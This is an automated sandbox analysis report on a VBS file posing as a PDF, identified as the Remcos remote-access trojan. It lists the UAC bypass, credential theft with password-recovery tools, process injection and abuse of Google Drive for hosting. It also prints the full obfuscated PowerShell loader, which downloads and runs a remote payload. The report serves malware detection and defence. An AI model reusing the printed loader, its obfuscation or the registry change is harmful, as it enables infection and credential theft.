Malware Analysis Report

2024-12-01 03:06

Sample ID 241111-kzftgazqhm
Target 074c592b-5cc0-496d-b3fa-45a09d4363ce·pdf.vbs
SHA256 2bd56ceb64c1a9af7909370d31a3bfd6bb3debcfbb674491cc081b4a7088832a
Tags
execution remcos remotehost collection credential_access discovery evasion rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2bd56ceb64c1a9af7909370d31a3bfd6bb3debcfbb674491cc081b4a7088832a

Threat Level: Known bad

The file 074c592b-5cc0-496d-b3fa-45a09d4363ce·pdf.vbs was found to be: Known bad.

Malicious Activity Summary

execution remcos remotehost collection credential_access discovery evasion rat stealer trojan

Remcos family

Remcos

UAC bypass

NirSoft MailPassView

NirSoft WebBrowserPassView

Detected Nirsoft tools

Uses browser remote debugging

Blocklisted process makes network request

Checks computer location settings

Accesses Microsoft Outlook accounts

Legitimate hosting services abused for malware hosting/C2

Command and Scripting Interpreter: PowerShell

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Modifies registry key

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 09:02

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 09:02

Reported

2024-11-11 09:04

Platform

win7-20241010-en

Max time kernel

119s

Max time network

124s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\074c592b-5cc0-496d-b3fa-45a09d4363ce·pdf.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\074c592b-5cc0-496d-b3fa-45a09d4363ce·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nonargumentatively Dendrocoela Coalmonger Doorway Foranstaltningerne Socialcentret #><#Kiddushin Christins Isoantigen Pangas Timucua Uniformising servicekonceptets #>$polypian='Berytidae';function Mandages($Bellwether){If ($host.DebuggerEnabled) {$Balkily++;$Formummede=$Bellwether.'Length' - $Balkily} for ( $Hurraet=4;$Hurraet -lt $Formummede;$Hurraet+=5){$Alejandro=$Hurraet;$Buhkoen+=$Bellwether[$Hurraet]}$Buhkoen}function Tervariant($Replanter){ .($Socialhjlpsmodtagere) ($Replanter)}$Nringsmaterialerne=Mandages ' AskNStvlEEv cTSved.BlksWMas EUnnaBUndec alsl ReviVasoeOldnnForlTCrin ';$Hurraetngrainedness=Mandages 'Lft,MSl goFirez B oiEd.elUdmrlMagtaLunc/Mag ';$Acidulousness=Mandages ' Fi Ta.tilEsths aml1Sven2Zebi ';$Stevedoringerne='Rain[Fem.NBetaeMiniTn rm.SejlSEntre ProR T,mVBeami K ncDidaE opdP Beeo P uiHjb.nLap,tJunimmisoaAny,NRel,Apl tgKab.esygeROpre] A.r:N.na:Bl aSGyltEMucoCMan uhjesRInv I Pyot,tevYKaraPEc tR IleOBesut ravO GascS bsoAci lTeks=Nava$ TumaAngic ori SelDN ncU alolKommOFor,u legsdeacN UndEStemSAb as Vel ';$Hurraetngrainedness+=Mandages 'Mam 5Ove .A el0L.nk An a(Su.eWSetoiFabrnHomodKingoOmgrwE apsDans cleiNT ioTSort Aars1Khes0lvsp. obj0 ise;Sc e NonoWBrndiU ben Skr6Trfo4Stam;rase T naxVare6Avan4Con,;Unde OmkorBegrvPolo:Ejst1Task3Vol 1Fant. usk0Virk)Idle SamG kjaeFjarcbrank ostoFolk/Afsk2.orb0Sne 1 Cur0Wast0,rut1 am0Inte1Out Sa.sFElasiBortrL ste llfUnhooFlytxSkra/ b.t1 S.l3Prev1 et.Seti0Lobb ';$Rundrejserne=Mandages 'ProguF.rbsAfvaEMaanr S n-J spa AkaGAun eflodn S.etAphe ';$Skanke=Mandages 'Diath Dr t FeltSvmmpDeflsScu.:.eci/ Gus/Pr tdSuccrHeksiMis.vPothe .ac.Uncag iloRaceoRoekgRectlBidseSemi.Romac S.eo.ealm pos/RednuIllecA.th? skeeEnwoxK ckpTacioStifrStbetNonp=Prstd RegoTretw M nnBed,ldidaodal abijedBis &PinniE ecd ,in=Konj1Esp OPla m.epiV TrfE inQ.bilTPraezImmeE NonFMic USpud0UpmoCMarcm Tr PDo.nxVa sErecrdLynlID.sbDGru TKo sM PetBBystK moozS,ntKBill0 SkaLspndvLoveQTranC E,rDEpicxFart ';$Blyantsstiftens=Mandages 'I du>N nb ';$Socialhjlpsmodtagere=Mandages ' LaniStanELangXR gs ';$Resetter='biografiskes';$Leadout='\Overballast.Van';Tervariant (Mandages 'Dift$ HypgAnsvLBrneoIndbbBrugAB dsl P r: Anot,avnI InslEfteGFo.koSkold.once u.pS HysKMagaRCircIIntiVfstne Hux=buga$PseuE desnoutbVRead: gr ACiviP c,rpForudCiviaMo.ltForeA.ret+Gast$ VallVandeja iAB red,nbooNoneUEditTSubl ');Tervariant (Mandages 'Valg$ ,lkgBuddLFldno KryBPebaAA kol ,dk:Ca cAEksplLedelnineO S uPNattLDosmA WorsSr mMplne=Gorm$ verS Tork Du ARenoNUnc.K audeSa p. DynsMe aPApotL holIUndeTBar,(Reta$ Ti bFarrl ProYNaamADataN ForT AfssPreesDataT redI.ollFSuccTGasbeMegunK.ypsUnde) Amb ');Tervariant (Mandages $Stevedoringerne);$Skanke=$Alloplasm[0];$Bagstavnenes=(Mandages 'Demo$FritgVil,lA stOSemibPleuAFli l ol: ExclFumeE dapRSlavs ,ent ConAStraMFejlpIntreTon Tc.mu=Hav,nAtt ePrerW,eet-SkanoKogebHithJUnese isocSamatS,mi MahoSAutoYFumeSMervTdoc edatamVen .prot$.ompNWa tr VagiBilanvareGPs,mS abnMTiptANoncTKasseSalarTusii Acoa B wLAktiEResyr AffNTremE Rea ');Tervariant ($Bagstavnenes);Tervariant (Mandages 'Auto$TrstLSteme ThrrA,ies H.etKo oaSaldmA,stpnerve b,nt Unb.BowsHTraceAc ra N,gdDe,ieBogmrTernsNonc[ ve$ thuR stouS,ernSc nd umlr SyneUn ej IntsDekoeMilirMenin ArieErhv]Side=eder$Af iHKreeuMffer Manr ysia EnteAse tSnown trkgVar,rJorda rli F enDannePopud SolnFonteDys.sI,pes alg ');$bolines=Mandages 'Udb $SpreLRe.pebettrKultsSpgetp,ikaTsarmO.etpAldeeCatctVand.A baD .unoGen wE.isn illBouvoCir.a,ebgd Et FNemaiLownl TvaeDaab( F r$SydvSD.alk Stia arbnR,gikUdrieFelt, Bet$ fejFPintdSkoleLrt.nSam dSt neR adsRetn)rdse ';$Fdendes=$Tilgodeskrive;Tervariant (Mandages 'Chri$FoldGSa,oLWel OGeogB MilaPa iLJaco: TurlThr,A G nZ P,vuModeRProciC,mutTripEE cusFlle=Prin(Si,nTJur,EUtroSBlomTBun -iconp OveaKonfTProsHUrta ign$EpitFDyrpD TruePropNOstaDUn.oethorSA.pe)Opd ');while (!$lazurites) {Tervariant (Mandages 'Gaas$ Me,gAerelGrunoInteb Lsea ItclFagu: NilMT rvaSv,ncBiogr AfsawrinnCurld.ruer nteetwit=.ppe$GrahtTilrrUnbeu,riveIlio ') ;Tervariant $bolines;Tervariant (Mandages ' KalS ealtUa baSkn R Chat Ka -K ppsNanoLWos,ewebfeDaarpS ak Belu4,nke ');Tervariant (Mandages 'Attr$GravgSdcelHempOU,reBknorACrosLMa,s:Pseul Kama MisZG.tgUFal rSti IHulkt Bloe krisNonr=Non.(TrumTha,leGo,eSE nstMe l-p trP ashaFinatbankHAfst .ain$ Damf erDStavEko rnAutod M,kEIntes .vi)Inte ') ;Tervariant (Mandages 'Belg$MentGStralUr tOUn obSpisAUnifL Pro:DecicAllohScanlNo,sOSandrPer oDy,gpBusfH DomytetrcAkryehofmA TrieV.lm= Bet$ P.tgsamtLBud.oStraB eaga UnbL Tau:KirkGDissaSesqLBezzlMundESk,kO ainNFis,sNeis+Civi+Rupi%afv.$ManfAGlidLBovoL Ta ODiv.pBrstLD.taAGastsalkaMSeal.Helmc FyroUnviUPlouNNvnsTPrec ') ;$Skanke=$Alloplasm[$Chlorophyceae]}$Maze=301481;$Ruskninger=28816;Tervariant (Mandages 'Samf$ KakGOpfilTjuro Oe.BUnprAGashlR,ya:Farts oildRoi ERummSHeksTRoteONu,pfAnlifFeltePaleRTeleNJaileArboSKilo W is=Mdea Fo,GForhEsprdt Fr -In uCPartoS rmnTofrTOveremu,aNO lyTPr t Udbu$TamsfPlatD StrEPo.cNHodeDTa vE ScaSHere ');Tervariant (Mandages 'Non $Mag g G.ml.rmio rfrbSmagaMiljl Aff: .ubCLithoAktil uaroBebynUnspiVildsSubjaF eebPengistrel,kspiPlebtFl eiWinde IndsTumi Udhn= Udt dalf[TyfuSSttey Suss UnstOdeleT,scmQu.m.Ze,oCTi goRevinOddfvAsoce UtmrEn et Tv.] Mil: Ant:VandFGlimrBov.o,iccmSamfBReckaDoucs preeF jl6Oxid4SubcS F et MarrP.oviMin.nLodsgVolu( Ove$GraiS.lerdFeede evs fdt FruoRe afTrbufSti,eScorrGastnTerneVogtsPoli) ,ip ');Tervariant (Mandages 'Ud.v$CateGBlidLT rvoSootBS.maA lyvlMiss:MaftSR fot,fskIFr,kNFlamgIridF ubsI mfusPochh MaxEi,disDing Balt=Aban Dest[ Re.s oreYP rlSIliutBo.iET,moMTita.CmdrTshepeFnikXTitrtHusb. beceMariNFortcUdnaO k mD ngeiDekanA,tiGLull] ,ty:Laan: .ncALetnS CovC TiliGy eILucr.WeekgUndie luft tops Fa TGasrrCoppi prnForug acu(a tf$Per.cTangosemiLStenODresn Be,iUncrsPookAWhorbag,lI TreLTa eiPr,ktUre IShage LarSe th)In x ');Tervariant (Mandages '.can$CorwgIndelFngsO.eriBRi jaIldsLresy:BevrVpip EGenaNValgeSammkClerL SluaFrucPAss =Delt$ LevS orbTRecei.rianPelogD xtfArk I SkdsBad.HKok,eKrftSOutg.EkspsConcuEc ib T os BastRetrR .ubI LibNSt mGProg(Ranc$PerlMToteaRynkZ H aeVres, Spr$.oleRP.nju Ganspreak iftNDidliOutmnCrengenthe SurRAar ) .rd ');Tervariant $Veneklap;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\CabE562.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2724-20-0x000007FEF63DE000-0x000007FEF63DF000-memory.dmp

memory/2724-21-0x000000001B270000-0x000000001B552000-memory.dmp

memory/2724-22-0x0000000002360000-0x0000000002368000-memory.dmp

memory/2724-23-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2724-24-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2724-26-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2724-25-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2724-27-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2724-28-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2724-29-0x000007FEF63DE000-0x000007FEF63DF000-memory.dmp

memory/2724-30-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2724-31-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2724-32-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2724-33-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-11 09:02

Reported

2024-11-11 09:04

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

153s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\074c592b-5cc0-496d-b3fa-45a09d4363ce·pdf.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\msiexec.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2400 set thread context of 2424 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2400 set thread context of 4448 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2400 set thread context of 3764 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1076 wrote to memory of 4528 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1076 wrote to memory of 4528 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1468 wrote to memory of 2400 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 1468 wrote to memory of 2400 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 1468 wrote to memory of 2400 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 1468 wrote to memory of 2400 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 4924 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 2400 wrote to memory of 4924 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 2400 wrote to memory of 4924 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 4924 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4924 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4924 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2400 wrote to memory of 2548 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2400 wrote to memory of 2548 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2400 wrote to memory of 2424 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 2424 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 2424 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 2424 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 436 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 436 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 436 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 1760 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 1760 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 1760 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 4448 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 4448 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 4448 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 4448 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 3764 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 3764 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 3764 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 3764 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
